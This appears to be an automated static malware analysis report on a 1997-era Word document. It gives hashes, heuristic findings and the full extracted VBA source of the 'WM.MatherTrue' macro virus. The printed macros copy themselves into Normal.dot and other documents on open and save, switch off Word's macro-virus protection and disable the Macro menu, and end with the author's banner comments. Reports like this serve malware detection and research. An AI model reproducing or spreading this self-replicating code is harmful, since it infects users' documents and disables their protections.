Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 990b94bb0b01b507…

MALICIOUS

Office (OLE)

35.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-10-03
MD5: e80226b7de9c32c543b2f8616357916c SHA-1: e77577c19c801a51509c100fc0cad0a4a7599d37 SHA-256: 990b94bb0b01b50718c74c4e3a2216f729f4c6a32b5c34b89e8d8580bbae2663
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro-virus, specifically triggering on 'ToolsMacro' and 'AutoOpen'. While the VBA code is truncated, the presence of these markers and the ClamAV detection of 'Win.Trojan.C-286' strongly indicate malicious intent, likely to execute further payloads.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
                    .VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 36,352 bytes but its declared streams total only 16,490 bytes — 19,862 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7029 bytes
SHA-256: 4f2365f211bff973e9feec6a07e21d83c72b1abff9aa65ef666f1b7378ebaa9e
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MatherTrue"
Option Explicit

  Dim ResultFDoc As Boolean 'True åñëè â àêòèâíîì äîêóìåíòå åñòü ìîäóëü ñ èìåíåì Ìname
  Dim ResultFTemplite As Boolean 'True åñëè â Normal.Dot åñòü ìîäóëü ñ èìåíåì Ìname
  Dim Path_Normal As String 'ïóòü ê Normal.Dot
  Dim Path_Doc As String 'ïóòü ê àêòèâíîìó äîêóìåíòó
  Dim I As Integer 'ïåðåìåííàÿ äëÿ öèêëà
  Dim HowMach As Integer 'êîëè÷åñòâî ìîäóëåé â ïðîåêòå
  Dim Doc As Boolean
  Dim N As Integer

  Public Const Mname As String = "MatherTrue" 'èìÿ ìîäóëÿ, îòêóäà áðàòü êîä
  
'Âûçûâàåòüñÿ ïðè íàæàòèè íà êíîïêó Organizer
Public Sub Organizer()
Attribute Organizer.VB_Description = "Ìàêðîñ çàïèñàí 31.03.99 33715351"
Attribute Organizer.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.DS"
           CommandBars("Visual Basic").Enabled = True
           With CommandBars("Macro")
             For I = 1 To .Controls.Count
                 .Controls(I).Enabled = False
             Next I
           End With
           ShowVisualBasicEditor = False
           Application.DisplayStatusBar = True
           With Options
                .VirusProtection = False
                .AllowFastSave = True
                .SaveInterval = 3
           End With
End Sub

'Âûçûâàåòüñÿ ïðè íàæàòèè íà êíîïêó Macro
Public Sub ToolsMacro()
End Sub

'Âûçûâàåòüñÿ ïðè ñîçäàíèè íîâîãî äîêóìåíòà (ïðè çàïóñêå Word'à íîâûé äîêóìåíò ñîçäà¸òüñÿ àâòîìàòè÷åñêè)
Public Sub AutoNew()
           Call Organizer
End Sub

'Âûçûâàåòüñÿ ïðè àêòèâèçàöèè ðåæèìà ñîõðàíåíèÿ àêòèâíîãî äîêóìåíòà èëè øàáëîíà (íàæàòèè íà êíîïêó "Ñîõðàíèòü")
Public Sub FileSave()
              Doc = False
              N = Len(ActiveDocument.Name)
           If N < 10 Then N = 1
           If N >= 10 And N <= 99 Then N = 2
           If N >= 99 And N <= 1000 Then N = 3
           If Mid(ActiveDocument.Name, 1, Len(ActiveDocument.Name) - N) = "Äîêóìåíò" Then Doc = True
           ShowVisualBasicEditor = True
           ResultFDoc = False
           If PrintPreview = False Then
              HowMach = Application.ActiveDocument.VBProject.VBComponents.Count
              For I = 1 To HowMach
                If Mname = Application.ActiveDocument.VBProject.VBComponents(I).Name Then ResultFDoc = True
              Next I
              If ResultFDoc <> True Then
                 Path_Normal = Application.NormalTemplate.FullName
                 Path_Doc = Application.ActiveDocument.FullName
                 Application.OrganizerCopy Source:=Path_Normal, Destination:=Path_Doc, Name:=Mname, Object:=wdOrganizerObjectProjectItems
                 Call Organizer
              End If
            If Doc = True Then Dialogs(wdDialogFileSaveAs).Show: Exit Sub
            ActiveDocument.Save
            End If
End Sub

'Âûçûâàåòüñÿ ïðè àêòèâèçàöèè ðåæèìà ñîõðàíåíèÿ âñåõ àêòèâíûõ äîêóìåíòîâ è/èëè øàáëîíîâ (íàæàòèè íà êíîïêó "Ñîõðàíèòü âñå")
Public Sub FileSaveAll()
           ShowVisualBasicEditor = False
           Call FileSave
End Sub

'Âûçûâàåòüñÿ ïðè àêòèâèçàöèè ðåæèìà ïå÷àòè ñ òåêóùèìè óñòàíîâêàìè
Public Sub FilePrintDefault()
           ShowVisualBasicEditor = False
         '  ActiveDocument.Content.InsertAfter Text:="Âîò òàêàÿ îíà ïðàâäà-ìàìêà, à ïðîòèâ ïðàâäû íå ïîïð¸øü...Ïðèâåò  Ìèõàéëîâîé Þëüêå. Coded by DI°            WM.MatherTrue -  I see, i'm here, i'm conqure ..."
           ActiveDocument.PrintOut
End Sub

'Âûçûâàåòüñÿ ïðè àêòèâèçàöèè äèàëîãîîãî îêíà ïå÷àòè
Public Sub FilePrint()
           ShowVisualBasicEditor = False
        '   ActiveDocument.Content.InsertAfter Text:="Âîò òàêàÿ îíà ïðàâäà-ìàìêà, à ïðîòèâ ïðàâäû íå ïîïð¸øü...Ïðèâåò  Ìèõàéëîâîé Þëüêå. Coded by DI°            WM.MatherTrue -  I see, i'm here, i'm conqure ... "
           Dialogs(wdDialogFilePrint).Show
End Sub

'Âûçûâàåòüñÿ ïðè îòêðûòèè äîêóìåíòà/øàáëîíà
'èíñòàëÿöèÿ êîäà â Normal.Dot
Public Sub AutoOpen()
           ResultFTemplite = False
           If PrintPreview = False Then
              HowMach = Application.NormalTemplate.VBProject.VBComponents.Count
              For I = 1 To HowMach
                If Mname = Application.NormalTemplate.VBProject.VBComponents(I).Name Then ResultFTemplite = True
              Next I
              If ResultFTemplite <> True Then
                 Path_Normal = Application.NormalTemplate.FullName
                 Path_Doc = Application.ActiveDocument.FullName
                 Application.OrganizerCopy Source:=Path_Doc, Destination:=Path_Normal, Name:=Mname, Object:=wdOrganizerObjectProjectItems
              End If
           End If
End Sub
' Destroyer Inc° Or PIPA's E&CS™ Company presented the
' MacroVirus WM.MatherTrue
' (C) CopyRight 16.04.1999 Ukrein Hmelnitsky
' WM.MatherTrue Was Make In Ms Offise (MS Word - 8.0)
' Hackers And VirusMakers All Country - UNITED !!!
' "Virus For PC, PC For Virus"
' Big Hy For VRV Virus Production™, Predator'S°,SNAKE,S@S,DM,AlexHelraiser  by Destroyer Inc °
' ÄÅÌÁÅËÜ íå èçáåæåí !!!' ÀÐÈß áåññìåðòíà !!! ÀÐÈß The Best !!!
'
' #####      ######    #####    #######   ######     ####    #     #   ######   ######
' #    ##    #    #   #     #      #      #     #   #    #   #     #   #    #   #     #
' #     ##   # #      #            #      #     #   #    #   #     #   # #      #     #
' #      #   ###       #####       #      ######    #    #    #### #   ###      ######
' #     ##   # #            #      #      #  #      #    #         #   # #      #  #
' #    ##    #    #   #     #      #      #   #     #    #         #   #    #   #   #
' #####      ######    #####       #      #    #     ####     ####     ######   #    #
'
'
'         #######   #     #   #######   ##
'            #      ##    #   #     #   ##
'            #      # #   #   #
'            #      #  #  #   #
'            #      #   # #   #
'            #      #    ##   #
'         #######   #     #   #######
'
'